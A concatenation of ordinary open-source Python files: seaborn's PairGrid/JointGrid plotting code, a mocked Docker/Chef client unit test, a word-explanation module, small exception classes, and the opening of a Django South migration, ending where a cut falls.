fixed_color = kwargs.pop("color", None)
for var, ax in zip(self.diag_vars, self.diag_axes):
hue_grouped = self.data[var].groupby(self.hue_vals)
plot_kwargs = kwargs.copy()
if str(func.__module__).startswith("seaborn"):
plot_kwargs["ax"] = ax
else:
plt.sca(ax)
for k, label_k in enumerate(self._hue_order):
# Attempt to get data for this level, allowing for empty
try:
data_k = hue_grouped.get_group(label_k)
except KeyError:
data_k = pd.Series([], dtype=float)
if fixed_color is None:
color = self.palette[k]
else:
color = fixed_color
if self._dropna:
data_k = utils.remove_na(data_k)
if str(func.__module__).startswith("seaborn"):
func(x=data_k, label=label_k, color=color, **plot_kwargs)
else:
func(data_k, label=label_k, color=color, **plot_kwargs)
self._add_axis_labels()
return self
def _map_bivariate(self, func, indices, **kwargs):
"""Draw a bivariate plot on the indicated axes."""
# This is a hack to handle the fact that new distribution plots don't add
# their artists onto the axes. This is probably superior in general, but
# we'll need a better way to handle it in the axisgrid functions.
from .distributions import histplot, kdeplot
if func is histplot or func is kdeplot:
self._extract_legend_handles = True
kws = kwargs.copy() # Use copy as we insert other kwargs
for i, j in indices:
x_var = self.x_vars[j]
y_var = self.y_vars[i]
ax = self.axes[i, j]
if ax is None: # i.e. we are in corner mode
continue
self._plot_bivariate(x_var, y_var, ax, func, **kws)
self._add_axis_labels()
if "hue" in signature(func).parameters:
self.hue_names = list(self._legend_data)
def _plot_bivariate(self, x_var, y_var, ax, func, **kwargs):
"""Draw a bivariate plot on the specified axes."""
if "hue" not in signature(func).parameters:
self._plot_bivariate_iter_hue(x_var, y_var, ax, func, **kwargs)
return
kwargs = kwargs.copy()
if str(func.__module__).startswith("seaborn"):
kwargs["ax"] = ax
else:
plt.sca(ax)
if x_var == y_var:
axes_vars = [x_var]
else:
axes_vars = [x_var, y_var]
if self._hue_var is not None and self._hue_var not in axes_vars:
axes_vars.append(self._hue_var)
data = self.data[axes_vars]
if self._dropna:
data = data.dropna()
x = data[x_var]
y = data[y_var]
if self._hue_var is None:
hue = None
else:
hue = data.get(self._hue_var)
kwargs.setdefault("hue", hue)
kwargs.setdefault("hue_order", self._hue_order)
kwargs.setdefault("palette", self._orig_palette)
func(x=x, y=y, **kwargs)
self._update_legend_data(ax)
def _plot_bivariate_iter_hue(self, x_var, y_var, ax, func, **kwargs):
"""Draw a bivariate plot while iterating over hue subsets."""
kwargs = kwargs.copy()
if str(func.__module__).startswith("seaborn"):
kwargs["ax"] = ax
else:
plt.sca(ax)
if x_var == y_var:
axes_vars = [x_var]
else:
axes_vars = [x_var, y_var]
hue_grouped = self.data.groupby(self.hue_vals)
for k, label_k in enumerate(self._hue_order):
kws = kwargs.copy()
# Attempt to get data for this level, allowing for empty
try:
data_k = hue_grouped.get_group(label_k)
except KeyError:
data_k = pd.DataFrame(columns=axes_vars,
dtype=float)
if self._dropna:
data_k = data_k[axes_vars].dropna()
x = data_k[x_var]
y = data_k[y_var]
for kw, val_list in self.hue_kws.items():
kws[kw] = val_list[k]
kws.setdefault("color", self.palette[k])
if self._hue_var is not None:
kws["label"] = label_k
if str(func.__module__).startswith("seaborn"):
func(x=x, y=y, **kws)
else:
func(x, y, **kws)
self._update_legend_data(ax)
def _add_axis_labels(self):
"""Add labels to the left and bottom Axes."""
for ax, label in zip(self.axes[-1, :], self.x_vars):
ax.set_xlabel(label)
for ax, label in zip(self.axes[:, 0], self.y_vars):
ax.set_ylabel(label)
if self._corner:
self.axes[0, 0].set_ylabel("")
def _find_numeric_cols(self, data):
"""Find which variables in a DataFrame are numeric."""
numeric_cols = []
for col in data:
if variable_type(data[col]) == "numeric":
numeric_cols.append(col)
return numeric_cols
class JointGrid(_BaseGrid):
"""Grid for drawing a bivariate plot with marginal univariate plots.
Many plots can be drawn by using the figure-level interface :func:`jointplot`.
Use this class directly when you need more flexibility.
"""
@_deprecate_positional_args
def __init__(
self, *,
x=None, y=None,
data=None,
height=6, ratio=5, space=.2,
dropna=False, xlim=None, ylim=None, size=None, marginal_ticks=False,
hue=None, palette=None, hue_order=None, hue_norm=None,
):
# Handle deprecations
if size is not None:
height = size
msg = ("The `size` parameter has been renamed to `height`; "
"please update your code.")
warnings.warn(msg, UserWarning)
# Set up the subplot grid
f = plt.figure(figsize=(height, height))
gs = plt.GridSpec(ratio + 1, ratio + 1)
ax_joint = f.add_subplot(gs[1:, :-1])
ax_marg_x = f.add_subplot(gs[0, :-1], sharex=ax_joint)
ax_marg_y = f.add_subplot(gs[1:, -1], sharey=ax_joint)
self._figure = f
self.ax_joint = ax_joint
self.ax_marg_x = ax_marg_x
self.ax_marg_y = ax_marg_y
# Turn off tick visibility for the measure axis on the marginal plots
plt.setp(ax_marg_x.get_xticklabels(), visible=False)
plt.setp(ax_marg_y.get_yticklabels(), visible=False)
plt.setp(ax_marg_x.get_xticklabels(minor=True), visible=False)
plt.setp(ax_marg_y.get_yticklabels(minor=True), visible=False)
# Turn off the ticks on the density axis for the marginal plots
if not marginal_ticks:
plt.setp(ax_marg_x.yaxis.get_majorticklines(), visible=False)
plt.setp(ax_marg_x.yaxis.get_minorticklines(), visible=False)
plt.setp(ax_marg_y.xaxis.get_majorticklines(), visible=False)
plt.setp(ax_marg_y.xaxis.get_minorticklines(), visible=False)
plt.setp(ax_marg_x.get_yticklabels(), visible=False)
plt.setp(ax_marg_y.get_xticklabels(), visible=False)
plt.setp(ax_marg_x.get_yticklabels(minor=True), visible=False)
plt.setp(ax_marg_y.get_xticklabels(minor=True), visible=False)
ax_marg_x.yaxis.grid(False)
ax_marg_y.xaxis.grid(False)
# Process the input variables
p = VectorPlotter(data=data, variables=dict(x=x, y=y, hue=hue))
plot_data = p.plot_data.loc[:, p.plot_data.notna().any()]
# Possibly drop NA
if dropna:
plot_data = plot_data.dropna()
def get_var(var):
vector = plot_data.get(var, None)
if vector is not None:
vector = vector.rename(p.variables.get(var, None))
return vector
self.x = get_var("x")
self.y = get_var("y")
self.hue = get_var("hue")
for axis in "xy":
name = p.variables.get(axis, None)
if name is not None:
getattr(ax_joint, f"set_{axis}label")(name)
if xlim is not None:
ax_joint.set_xlim(xlim)
if ylim is not None:
ax_joint.set_ylim(ylim)
# Store the semantic mapping parameters for axes-level functions
self._hue_params = dict(palette=palette, hue_order=hue_order, hue_norm=hue_norm)
# Make the grid look nice
utils.despine(f)
if not marginal_ticks:
utils.despine(ax=ax_marg_x, left=True)
utils.despine(ax=ax_marg_y, bottom=True)
for axes in [ax_marg_x, ax_marg_y]:
for axis in [axes.xaxis, axes.yaxis]:
axis.label.set_visible(False)
f.tight_layout()
f.subplots_adjust(hspace=space, wspace=space)
def _inject_kwargs(self, func, kws, params):
"""Add params to kws if they are accepted by func."""
func_params = signature(func).parameters
for key, val in params.items():
if key in func_params:
kws.setdefault(key, val)
def plot(self, joint_func, marginal_func, **kwargs):
"""Draw the plot by passing functions for joint and marginal axes.
This method passes the ``kwargs`` dictionary to both functions. If you
need more control, call :meth:`JointGrid.plot_joint` and
:meth:`JointGrid.plot_marginals` directly with specific parameters.
Parameters
----------
joint_func, marginal_func : callables
Functions to draw the bivariate and univariate plots. See methods
referenced above for information about the required characteristics
of these functions.
kwargs
Additional keyword arguments are passed to both functions.
Returns
-------
:class:`JointGrid` instance
Returns ``self`` for easy method chaining.
"""
self.plot_marginals(marginal_func, **kwargs)
self.plot_joint(joint_func, **kwargs)
return self
def plot_joint(self, func, **kwargs):
"""Draw a bivariate plot on the joint axes of the grid.
Parameters
----------
func : plotting callable
If a seaborn function, it should accept ``x`` and ``y``. Otherwise,
it must accept ``x`` and ``y`` vectors of data as the first two
positional arguments, and it must plot on the "current" axes.
If ``hue`` was defined in the class constructor, the function must
accept ``hue`` as a parameter.
kwargs
Keyword argument are passed to the plotting function.
Returns
-------
:class:`JointGrid` instance
Returns ``self`` for easy method chaining.
"""
kwargs = kwargs.copy()
if str(func.__module__).startswith("seaborn"):
kwargs["ax"] = self.ax_joint
else:
plt.sca(self.ax_joint)
if self.hue is not None:
kwargs["hue"] = self.hue
self._inject_kwargs(func, kwargs, self._hue_params)
if str(func.__module__).startswith("seaborn"):
func(x=self.x, y=self.y, **kwargs)
else:
func(self.x, self.y, **kwargs)
return self
def plot_marginals(self, func, **kwargs):
"""Draw univariate plots on each marginal axes.
Parameters
----------
func : plotting callable
If a seaborn function, it should accept ``x`` and ``y`` and plot
when only one of them is defined. Otherwise, it must accept a vector
of data as the first positional argument and determine its orientation
using the ``vertical`` parameter, and it must plot on the "current" axes.
If ``hue`` was defined in the class constructor, it must accept ``hue``
as a parameter.
kwargs
Keyword argument are passed to the plotting function.
Returns
-------
:class:`JointGrid` instance
Returns ``self`` for easy method chaining.
"""
seaborn_func = (
str(func.__module__).startswith("seaborn")
# deprecated distplot has a legacy API, special case it
and not func.__name__ == "distplot"
)
func_params = signature(func).parameters
kwargs = kwargs.copy()
if self.hue is not None:
kwargs["hue"] = self.hue
self._inject_kwargs(func, kwargs, self._hue_params)
if "legend" in func_params:
kwargs.setdefault("legend", False)
if "orientation" in func_params:
# e.g. plt.hist
orient_kw_x = {"orientation": "vertical"}
orient_kw_y = {"orientation": "horizontal"}
elif "vertical" in func_params:
# e.g. sns.distplot (also how did this get backwards?)
orient_kw_x = {"vertical": False}
orient_kw_y = {"vertical": True}
if seaborn_func:
func(x=self.x, ax=self.ax_marg_x, **kwargs)
else:
plt.sca(self.ax_marg_x)
func(self.x, **orient_kw_x, **kwargs)
if seaborn_func:
func(y=self.y, ax=self.ax_marg_y, **kwargs)
else:
plt.sca(self.ax_marg_y)
func(self.y, **orient_kw_y, **kwargs)
self.ax_marg_x.yaxis.get_label().set_visible(False)
self.ax_marg_y.xaxis.get_label().set_visible(False)
return self
def refline(
self, *, x=None, y=None, joint=True, marginal=True,
color='.5', linestyle='--', **line_kws
):
"""Add a reference line(s) to joint and/or marginal axes.
Parameters
----------
x, y : numeric
Value(s) to draw the line(s) at.
joint, marginal : bools
Whether to add the reference line(s) to the joint/marginal axes.
color : :mod:`matplotlib color <matplotlib.colors>`
Specifies the color of the reference line(s).
linestyle : str
Specifies the style of the reference line(s).
line_kws : key, value mappings
Other keyword arguments are passed to :meth:`matplotlib.axes.Axes.axvline`
when ``x`` is not None and :meth:`matplotlib.axes.Axes.axhline` when ``y``
is not None.
Returns
-------
:class:`JointGrid` instance
Returns ``self`` for easy method chaining.
"""
line_kws['color'] = color
line_kws['linestyle'] = linestyle
if x is not None:
if joint:
self.ax_joint.axvline(x, **line_kws)
if marginal:
self.ax_marg_x.axvline(x, **line_kws)
if y is not None:
if joint:
self.ax_joint.axhline(y, **line_kws)
if marginal:
self.ax_marg_y.axhline(y, **line_kws)
return self
def set_axis_labels(self, xlabel="", ylabel="", **kwargs):
"""Set axis labels on the bivariate axes.
Parameters
----------
xlabel, ylabel : strings
Label names for the x and y variables.
kwargs : key, value mappings
Other keyword arguments are passed to the following functions:
- :meth:`matplotlib.axes.Axes.set_xlabel`
- :meth:`matplotlib.axes.Axes.set_ylabel`
Returns
-------
:class:`JointGrid` instance
Returns ``self`` for easy method chaining.
"""
self.ax_joint.set_xlabel(xlabel, **kwargs)
self.ax_joint.set_ylabel(ylabel, **kwargs)
return self
JointGrid.__init__.__doc__ = """\
Set up the grid of subplots and store data internally for easy plotting.
Parameters
----------
{params.core.xy}
{params.core.data}
height : number
Size of each side of the figure in inches (it will be square).
ratio : number
Ratio of joint axes height to marginal axes height.
space : number
Space between the joint and marginal axes
dropna : bool
If True, remove missing observations before plotting.
{{x, y}}lim : pairs of numbers
Set axis limits to these values before plotting.
marginal_ticks : bool
If False, suppress ticks on the count/density axis of the marginal plots.
{params.core.hue}
Note: unlike in :class:`FacetGrid` or :class:`PairGrid`, the axes-level
functions must support ``hue`` to use it in :class:`JointGrid`.
{params.core.palette}
{params.core.hue_order}
{params.core.hue_norm}
See Also
--------
{seealso.jointplot}
{seealso.pairgrid}
{seealso.pairplot}
Examples
--------
.. include:: ../docstrings/JointGrid.rst
""".format(
params=_param_docs,
returns=_core_docs["returns"],
seealso=_core_docs["seealso"],
)
@_deprecate_positional_args
def pairplot(
data, *,
hue=None, hue_order=None, palette=None,
vars=None, x_vars=None, y_vars=None,
kind="scatter", diag_kind="auto", markers=None,
height=2.5, aspect=1, corner=False, dropna=False,
plot_kws=None, diag_kws=None, grid_kws=None, size=None,
):
"""Plot pairwise relationships in a dataset.
By default, this function will create a grid of Axes such that each numeric
variable in ``data`` will by shared across the y-axes across a single row and
the x-axes across a single column. The diagonal plots are treated
differently: a univariate distribution plot is drawn to show the marginal
distribution of the data in each column.
It is also possible to show a subset of variables or plot different
variables on the rows and columns.
This is a high-level interface for :class:`PairGrid` that is intended to
make it easy to draw a few common styles. You should use :class:`PairGrid`
directly if you need more flexibility.
Parameters
----------
data : `pandas.DataFrame`
Tidy (long-form) dataframe where each column is a variable and
each row is an observation.
hue : name of variable in ``data``
Variable in ``data`` to map plot aspects to different colors.
hue_order : list of strings
Order for the levels of the hue variable in the palette
palette : dict or seaborn color palette
Set of colors for mapping the ``hue`` variable. If a dict, keys
should be values in the ``hue`` variable.
vars : list of variable names
Variables within ``data`` to use, otherwise use every column with
a numeric datatype.
{x, y}_vars : lists of variable names
Variables within ``data`` to use separately for the rows and
columns of the figure; i.e. to make a non-square plot.
kind : {'scatter', 'kde', 'hist', 'reg'}
Kind of plot to make.
diag_kind : {'auto', 'hist', 'kde', None}
Kind of plot for the diagonal subplots. If 'auto', choose based on
whether or not ``hue`` is used.
markers : single matplotlib marker code or list
Either the marker to use for all scatterplot points or a list of markers
with a length the same as the number of levels in the hue variable so that
differently colored points will also have different scatterplot
markers.
height : scalar
Height (in inches) of each facet.
aspect : scalar
Aspect * height gives the width (in inches) of each facet.
corner : bool
If True, don't add axes to the upper (off-diagonal) triangle of the
grid, making this a "corner" plot.
dropna : boolean
Drop missing values from the data before plotting.
{plot, diag, grid}_kws : dicts
Dictionaries of keyword arguments. ``plot_kws`` are passed to the
bivariate plotting function, ``diag_kws`` are passed to the univariate
plotting function, and ``grid_kws`` are passed to the :class:`PairGrid`
constructor.
Returns
-------
grid : :class:`PairGrid`
Returns the underlying :class:`PairGrid` instance for further tweaking.
See Also
--------
PairGrid : Subplot grid for more flexible plotting of pairwise relationships.
JointGrid : Grid for plotting joint and marginal distributions of two variables.
Examples
--------
.. include:: ../docstrings/pairplot.rst
"""
# Avoid circular import
from .distributions import histplot, kdeplot
# Handle deprecations
if size is not None:
height = size
msg = ("The `size` parameter has been renamed to `height`; "
"please update your code.")
warnings.warn(msg, UserWarning)
if not isinstance(data, pd.DataFrame):
raise TypeError(
"'data' must be pandas DataFrame object, not: {typefound}".format(
typefound=type(data)))
plot_kws = {} if plot_kws is None else plot_kws.copy()
diag_kws = {} if diag_kws is None else diag_kws.copy()
grid_kws = {} if grid_kws is None else grid_kws.copy()
# Resolve "auto" diag kind
if diag_kind == "auto":
if hue is None:
diag_kind = "kde" if kind == "kde" else "hist"
else:
diag_kind = "hist" if kind == "hist" else "kde"
# Set up the PairGrid
grid_kws.setdefault("diag_sharey", diag_kind == "hist")
grid = PairGrid(data, vars=vars, x_vars=x_vars, y_vars=y_vars, hue=hue,
hue_order=hue_order, palette=palette, corner=corner,
height=height, aspect=aspect, dropna=dropna, **grid_kws)
# Add the markers here as PairGrid has figured out how many levels of the
# hue variable are needed and we don't want to duplicate that process
if markers is not None:
if kind == "reg":
# Needed until regplot supports style
if grid.hue_names is None:
n_markers = 1
else:
n_markers = len(grid.hue_names)
if not isinstance(markers, list):
markers = [markers] * n_markers
if len(markers) != n_markers:
raise ValueError(("markers must be a singleton or a list of "
"markers for each level of the hue variable"))
grid.hue_kws = {"marker": markers}
elif kind == "scatter":
if isinstance(markers, str):
plot_kws["marker"] = markers
elif hue is not None:
plot_kws["style"] = data[hue]
plot_kws["markers"] = markers
# Draw the marginal plots on the diagonal
diag_kws = diag_kws.copy()
diag_kws.setdefault("legend", False)
if diag_kind == "hist":
grid.map_diag(histplot, **diag_kws)
elif diag_kind == "kde":
diag_kws.setdefault("fill", True)
diag_kws.setdefault("warn_singular", False)
grid.map_diag(kdeplot, **diag_kws)
# Maybe plot on the off-diagonals
if diag_kind is not None:
plotter = grid.map_offdiag
else:
plotter = grid.map
if kind == "scatter":
from .relational import scatterplot # Avoid circular import
plotter(scatterplot, **plot_kws)
elif kind == "reg":
from .regression import regplot # Avoid circular import
plotter(regplot, **plot_kws)
elif kind == "kde":
from .distributions import kdeplot # Avoid circular import
plot_kws.setdefault("warn_singular", False)
plotter(kdeplot, **plot_kws)
elif kind == "hist":
from .distributions import histplot # Avoid circular import
plotter(histplot, **plot_kws)
# Add a legend
if hue is not None:
grid.add_legend()
grid.tight_layout()
return grid
@_deprecate_positional_args
def jointplot(
*,
x=None, y=None,
data=None,
kind="scatter", color=None, height=6, ratio=5, space=.2,
dropna=False, xlim=None, ylim=None, marginal_ticks=False,
joint_kws=None, marginal_kws=None,
hue=None, palette=None, hue_order=None, hue_norm=None,
**kwargs
):
# Avoid circular imports
from .relational import scatterplot
from .regression import regplot, residplot
from .distributions import histplot, kdeplot, _freedman_diaconis_bins
# Handle deprecations
if "size" in kwargs:
height = kwargs.pop("size")
msg = ("The `size` parameter has been renamed to `height`; "
"please update your code.")
warnings.warn(msg, UserWarning)
# Set up empty default kwarg dicts
joint_kws = {} if joint_kws is None else joint_kws.copy()
joint_kws.update(kwargs)
marginal_kws = {} if marginal_kws is None else marginal_kws.copy()
# Handle deprecations of distplot-specific kwargs
distplot_keys = [
"rug", "fit", "hist_kws", "norm_hist" "hist_kws", "rug_kws",
]
unused_keys = []
for key in distplot_keys:
if key in marginal_kws:
unused_keys.append(key)
marginal_kws.pop(key)
if unused_keys and kind != "kde":
msg = (
"The marginal plotting function has changed to `histplot`,"
" which does not accept the following argument(s): {}."
).format(", ".join(unused_keys))
warnings.warn(msg, UserWarning)
# Validate the plot kind
plot_kinds = ["scatter", "hist", "hex", "kde", "reg", "resid"]
_check_argument("kind", plot_kinds, kind)
# Raise early if using `hue` with a kind that does not support it
if hue is not None and kind in ["hex", "reg", "resid"]:
msg = (
f"Use of `hue` with `kind='{kind}'` is not currently supported."
)
raise ValueError(msg)
# Make a colormap based off the plot color
# (Currently used only for kind="hex")
if color is None:
color = "C0"
color_rgb = mpl.colors.colorConverter.to_rgb(color)
colors = [utils.set_hls_values(color_rgb, l=l) # noqa
for l in np.linspace(1, 0, 12)]
cmap = blend_palette(colors, as_cmap=True)
# Matplotlib's hexbin plot is not na-robust
if kind == "hex":
dropna = True
# Initialize the JointGrid object
grid = JointGrid(
data=data, x=x, y=y, hue=hue,
palette=palette, hue_order=hue_order, hue_norm=hue_norm,
dropna=dropna, height=height, ratio=ratio, space=space,
xlim=xlim, ylim=ylim, marginal_ticks=marginal_ticks,
)
if grid.hue is not None:
marginal_kws.setdefault("legend", False)
# Plot the data using the grid
if kind.startswith("scatter"):
joint_kws.setdefault("color", color)
grid.plot_joint(scatterplot, **joint_kws)
if grid.hue is None:
marg_func = histplot
else:
marg_func = kdeplot
marginal_kws.setdefault("warn_singular", False)
marginal_kws.setdefault("fill", True)
marginal_kws.setdefault("color", color)
grid.plot_marginals(marg_func, **marginal_kws)
elif kind.startswith("hist"):
# TODO process pair parameters for bins, etc. and pass
# to both jount and marginal plots
joint_kws.setdefault("color", color)
grid.plot_joint(histplot, **joint_kws)
marginal_kws.setdefault("kde", False)
marginal_kws.setdefault("color", color)
marg_x_kws = marginal_kws.copy()
marg_y_kws = marginal_kws.copy()
pair_keys = "bins", "binwidth", "binrange"
for key in pair_keys:
if isinstance(joint_kws.get(key), tuple):
x_val, y_val = joint_kws[key]
marg_x_kws.setdefault(key, x_val)
marg_y_kws.setdefault(key, y_val)
histplot(data=data, x=x, hue=hue, **marg_x_kws, ax=grid.ax_marg_x)
histplot(data=data, y=y, hue=hue, **marg_y_kws, ax=grid.ax_marg_y)
elif kind.startswith("kde"):
joint_kws.setdefault("color", color)
joint_kws.setdefault("warn_singular", False)
grid.plot_joint(kdeplot, **joint_kws)
marginal_kws.setdefault("color", color)
if "fill" in joint_kws:
marginal_kws.setdefault("fill", joint_kws["fill"])
grid.plot_marginals(kdeplot, **marginal_kws)
elif kind.startswith("hex"):
x_bins = min(_freedman_diaconis_bins(grid.x), 50)
y_bins = min(_freedman_diaconis_bins(grid.y), 50)
gridsize = int(np.mean([x_bins, y_bins]))
joint_kws.setdefault("gridsize", gridsize)
joint_kws.setdefault("cmap", cmap)
grid.plot_joint(plt.hexbin, **joint_kws)
marginal_kws.setdefault("kde", False)
marginal_kws.setdefault("color", color)
grid.plot_marginals(histplot, **marginal_kws)
elif kind.startswith("reg"):
marginal_kws.setdefault("color", color)
marginal_kws.setdefault("kde", True)
grid.plot_marginals(histplot, **marginal_kws)
joint_kws.setdefault("color", color)
grid.plot_joint(regplot, **joint_kws)
elif kind.startswith("resid"):
joint_kws.setdefault("color", color)
grid.plot_joint(residplot, **joint_kws)
x, y = grid.ax_joint.collections[0].get_offsets().T
marginal_kws.setdefault("color", color)
histplot(x=x, hue=hue, ax=grid.ax_marg_x, **marginal_kws)
histplot(y=y, hue=hue, ax=grid.ax_marg_y, **marginal_kws)
return grid
jointplot.__doc__ = """\
Draw a plot of two variables with bivariate and univariate graphs.
This function provides a convenient interface to the :class:`JointGrid`
class, with several canned plot kinds. This is intended to be a fairly
lightweight wrapper; if you need more flexibility, you should use
:class:`JointGrid` directly.
Parameters
----------
{params.core.xy}
{params.core.data}
kind : {{ "scatter" | "kde" | "hist" | "hex" | "reg" | "resid" }}
Kind of plot to draw. See the examples for references to the underlying functions.
{params.core.color}
height : numeric
Size of the figure (it will be square).
ratio : numeric
Ratio of joint axes height to marginal axes height.
space : numeric
Space between the joint and marginal axes
dropna : bool
If True, remove observations that are missing from ``x`` and ``y``.
{{x, y}}lim : pairs of numbers
Axis limits to set before plotting.
marginal_ticks : bool
If False, suppress ticks on the count/density axis of the marginal plots.
{{joint, marginal}}_kws : dicts
Additional keyword arguments for the plot components.
{params.core.hue}
Semantic variable that is mapped to determine the color of plot elements.
{params.core.palette}
{params.core.hue_order}
{params.core.hue_norm}
kwargs
Additional keyword arguments are passed to the function used to
draw the plot on the joint Axes, superseding items in the
``joint_kws`` dictionary.
Returns
-------
{returns.jointgrid}
See Also
--------
{seealso.jointgrid}
{seealso.pairgrid}
{seealso.pairplot}
Examples
--------
.. include:: ../docstrings/jointplot.rst
""".format(
params=_param_docs,
returns=_core_docs["returns"],
seealso=_core_docs["seealso"],
)
|
mwaskom/seaborn
|
seaborn/axisgrid.py
|
Python
|
bsd-3-clause
| 87,264
| 0.000562
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Docker client tests"""
from __future__ import unicode_literals
import mock
import docker
from docker.errors import DockerException
from oslo_config import cfg
from validator.common.exception import DockerContainerException
import validator.tests.base as tb
from validator.clients.chef_client import ChefClient
CONF = cfg.CONF
CONF.import_group('clients_chef', 'validator.clients.chef_client_ssh')
class ChefClientTestCase(tb.ValidatorTestCase):
"""Docker Client unit tests"""
def setUp(self):
""" Create a docker client"""
super(ChefClientTestCase, self).setUp()
self.client = ChefClient()
CONF.set_override('cmd_test', "cmdtest {}", group='clients_chef')
CONF.set_override('cmd_install', "cmdinstall {}", group='clients_chef')
CONF.set_override('cmd_inject', "cmdinject {}", group='clients_chef')
CONF.set_override('cmd_launch', "cmdlaunch {}", group='clients_chef')
def test_create_client(self):
""" Test client creation"""
self.assertRaises(DockerException, ChefClient, 'fakeurl')
self.assertIsInstance(self.client.dc, docker.client.Client)
def test_run_container(self):
""" Test container deployment"""
self.assertRaises(DockerContainerException, self.client.run_container, "fakeimage")
self.client.dc = mock.MagicMock()
self.client.run_container('validimage')
self.client.dc.create_container.assert_called_once_with('validimage', name=u'validimage-validate', tty=True)
self.client.dc.start.assert_called_once_with(container=self.client.container)
def test_stop_container(self):
""" Test stopping and removing a container"""
self.client.dc = self.m.CreateMockAnything()
self.client.dc.stop(self.client.container)
self.client.dc.remove_container(self.client.container)
self.m.ReplayAll()
self.client.remove_container()
self.m.VerifyAll()
def test_run_deploy(self):
self.client.execute_command = mock.MagicMock()
self.client.execute_command.return_value = "Alls good"
self.client.run_deploy("mycookbook")
obs = self.client.run_test("fakecookbook")
expected = "{'response': u'Alls good', 'success': True}"
self.assertEqual(expected, str(obs))
def test_run_install(self):
self.client.execute_command = self.m.CreateMockAnything()
self.client.container = "1234"
self.client.execute_command('cmdinstall fakecookbook').AndReturn("Alls good")
self.m.ReplayAll()
obs = self.client.run_install("fakecookbook")
expected = "{'response': u'Alls good', 'success': True}"
self.assertEqual(expected, str(obs))
self.m.VerifyAll()
def test_run_test(self):
self.client.execute_command = self.m.CreateMockAnything()
self.client.container = "1234"
self.client.execute_command('cmdtest fakecookbook').AndReturn("Alls good")
self.m.ReplayAll()
obs = self.client.run_test("fakecookbook")
expected = "{'response': u'Alls good', 'success': True}"
self.assertEqual(expected, str(obs))
self.m.VerifyAll()
def test_execute_command(self):
"""Test a command execution in container"""
self.client.dc = self.m.CreateMockAnything()
self.client.container = "1234"
self.client.dc.exec_create(cmd='/bin/bash -c "mycommand"', container=u'1234').AndReturn("validcmd")
self.client.dc.exec_start("validcmd").AndReturn("OK")
self.m.ReplayAll()
obs = self.client.execute_command("mycommand")
self.assertEqual("OK",obs)
self.m.VerifyAll()
def tearDown(self):
""" Cleanup environment"""
super(ChefClientTestCase, self).tearDown()
self.m.UnsetStubs()
self.m.ResetAll()
|
pmverdugo/fiware-validator
|
validator/tests/clients/test_chef_client.py
|
Python
|
apache-2.0
| 4,428
| 0.001807
|
import itertools
import random
from hb_res.explanation_source import sources_registry, ExplanationSource
__author__ = 'moskupols'
ALL_SOURCES = sources_registry.sources_registered()
ALL_SOURCES_NAMES_SET = frozenset(sources_registry.names_registered())
all_words_list = []
words_list_by_source_name = dict()
for s in ALL_SOURCES:
li = list(s.explainable_words())
words_list_by_source_name[s.name] = li
all_words_list.extend(li)
all_words_set = frozenset(all_words_list)
SELECTED_SOURCE = sources_registry.source_for_name('Selected')
SELECTION_LEVELS = {'good', 'all'}
def _pick_sources_by_names(names):
if names is None:
sources_filtered = ALL_SOURCES
else:
if isinstance(names, str):
names = [names]
sources_filtered = list(map(sources_registry.source_for_name, names))
return sources_filtered
def get_explainable_words(sources=None):
"""
Returns an iterable of all words for which we have any explanation.
:return: iterable
"""
sources = _pick_sources_by_names(sources)
return itertools.chain(map(ExplanationSource.explainable_words, sources))
def get_random_word(*, sources_names=None, selection_level=None):
# assert sources_names is None or selection_level is None
if sources_names is None:
return random.choice(all_words_list
if selection_level == 'all'
else words_list_by_source_name['Selected'])
# If the user wants a sole specific asset, the task is straightforward
if not isinstance(sources_names, str) and len(sources_names) == 1:
sources_names = sources_names[0]
if isinstance(sources_names, str):
return random.choice(words_list_by_source_name[sources_names])
# otherwise we have to pick a uniformly random element from several lists,
# but we wouldn't like to join them, as they are long
lists = [words_list_by_source_name[name] for name in sources_names]
total = sum(map(len, lists))
rand = random.randrange(total)
upto = 0
for word_list in lists:
upto += len(word_list)
if rand < upto:
return word_list[rand - upto] # yep, negative indexation
assert False, 'Shouldn\'t get here'
def explain_list(word, sources_names=None):
"""
Returns list of tuples (Explanations, asset_name)
"""
if word not in all_words_set:
return []
sources_filtered = _pick_sources_by_names(sources_names)
res = list()
for s in sources_filtered:
res.extend(zip(s.explain(word), itertools.repeat(s.name)))
random.shuffle(res)
return res
def explain(word, sources_names=None):
"""
Returns a tuple (Explanation, asset_name)
:param word: a russian noun in lowercase
:return: the explanation
"""
explanations = explain_list(word, sources_names)
return explanations[0] if len(explanations) else None
|
hatbot-team/hatbot
|
explanator/_explanator.py
|
Python
|
mit
| 2,930
| 0
|
class DestinationNotFoundException(Exception):
pass
class InvalidDateFormat(Exception):
pass
|
kapucko/bus-train-search
|
btsearch/exceptions.py
|
Python
|
apache-2.0
| 101
| 0.019802
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Face.district_id'
db.add_column(u'faces_face', 'district_id',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['faces.District'], null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Face.district_id'
db.delete_column(u'faces_face', 'district_id_id')
models = {
'album.imagecollection': {
'Meta': {'object_name': 'ImageCollection'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
